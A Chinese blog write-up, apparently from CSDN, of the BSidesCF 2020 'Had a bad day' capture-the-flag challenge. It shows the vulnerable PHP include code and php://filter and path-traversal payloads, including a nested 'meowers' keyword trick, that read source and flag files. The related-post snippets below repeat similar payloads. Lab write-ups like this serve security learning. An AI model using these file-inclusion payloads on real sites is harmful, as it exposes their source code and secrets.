[BSidesCF 2020]Had a bad day

最新推荐文章于 2024-04-26 23:16:19 发布
最新推荐文章于 2024-04-26 23:16:19 发布
阅读量386 收藏
点赞数
分类专栏: buu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missht0/article/details/113399830
版权

[BSidesCF 2020]Had a bad day

在这里插入图片描述
猜测可能有sql注入或者文件包含
尝试了sql注入有报错
在这里插入图片描述
确定是文件包含了,并且还在后面连接了一个.php

php://filter/read=convert.base64-encode/resource=index

在这里插入图片描述

<?php
	$file = $_GET['category'];

if(isset($file))
{
	if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
		include ($file . '.php');
	}
	else{
		echo "Sorry, we currently only support woofers and meowers.";
	}
}
?>

尝试直接读取/index.php?category=woofers/../flag
在这里插入图片描述
说明确实有flag.php这个文件噢
再用filter伪协议独取flag.php文件
这里有个知识点
php伪协议可以嵌套使用
在filter伪协议中,即

php://filter/read=convert.base64-encode/meowers/resource=flag

在这里插入图片描述
在这里插入图片描述

切谁怕谁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hada-p3
03-27
hada-p3
hada-p2
03-13
hada-p2
解决sql语句警告问题
weixin_58657334的博客
03-02 441
Java
BUUCTF_[BSidesCF 2020]Had a bad day
最新发布
m_de_g的博客
04-26 474
【代码】BUUCTF_[BSidesCF 2020]Had a bad day
[BSidesCF_2020]Had_a_bad_day
m0_52199518的博客
04-05 239
WP 可以说,这个题目就是教学题目,虽然我不会 这里考查php伪协议嵌套 跨进题目的大门就要找到注入点,这里在看到url的形式后联想/尝试文件包含,我完全没有往这里想,反而鬼畜的想到了模板注入, 而且差点忘了直接访问flag.php确定flag值位置,习惯太糟糕了 在选择按钮后URL为 http://d4a987de-9150-4004-9493-9173f710ba17.node3.buuoj.cn/index.php?category=woofers http://d4a987de-9150-4004
【BUUCTF】[BSidesCF 2020]Had a bad day
aoao331198的博客
04-24 754
注意到url中的参数category,以为是注入点,实际上输入其他的只会一个错误说明 用php伪协议读取文件 /index.php?category=php://filter/convert.base64-encode/resource=index 解密拿到代码 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || st.
六年级英语上册 Unit 7 I had a bad day.第一课时教案 广东版开心.doc
10-13
小学教案
六年级英语上册 Unit 7 I had a bad day.第三课时教案 广东版开心.doc
10-13
小学教案
HADA protocol-开源
04-28
用于实现用于序列比对的分层注释相关比对(HADA)协议的脚本以及相关功能。
BUUCTF之[BSidesCF 2020]Had a bad day --- 文件包含漏洞
weixin_44632787的博客
06-22 993
BUUCTF之[BSidesCF 2020]Had a bad day 题目 点击下面的那两个按钮的时候,发现图片会变化。而且链接上的值也是跟着变化。(看上去像是文件包含的题目) 点击链接的时候只是category=后面的值改变,使用盲猜是文件包含漏洞。所以试试?category=flag.php 好吧,可能是攻击的方式不对。换换其它的: ?category=flag.php # 失败 ?category=flag # 失败 ?category=php://filter/read=co
【CTF】ctf中用到的php伪协议总结及例题(持续更)
weixin_52450702的博客
02-03 2838
ctf中用到的php伪协议总结及例题
BUUCTF [web专项37][BSidesCF 2020]Had a bad day
yanglinchiji的博客
11-13 161
代码审计可以知道,category的右侧一定要是woofers或meowers或index。既然伪协议构造可以查看index,那么我们也可以看flag啊。不对,index在检查范围内,还是需要用到的。我们先来构造伪协议来查看index.php。但是重点是,url地方有注入点。尝试去掉php看看,应该也可以。进入后发现提示要点击两个按钮。点击后发现是猫狗图片。解码后,发现是个源码。发现有个base64。解密即可获得flag。
BUUCTF Web [BSidesCF 2020]Had a bad day1
qq_36831701的博客
05-18 180
通过报错信息可以看出,category参数会与.php拼接然后进行文件包含。传入参数woofers或者meowers会有一个文件包含。所以直接试一试传入flag看看能不能把flag包含出来。这里回显定制信息,说明被过滤,应该是白名单。strpos函数只要传的参数里面有这几个就行。回显东西的题应该都和文件包含多多少少有关。我们通过伪协议来获取index源代码试试。这里说是文件与文件包含有关。打开burp 开始抓包。这里提示包含文件失败。
Fern couldn't eat until her pig had had a drink of milk.中的两个had是什么意思
04-21
这个句子中的两个“had”都是动词“have”的过去分词形式,第一个是“had had”,表示发生在过去的过去,意为“已经喝过”,第二个是“had”,表示过去完成时,意为“已经有了”。整个句子的意思是:“在猪喝了一口牛奶之前,Fern不能吃东西。”

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值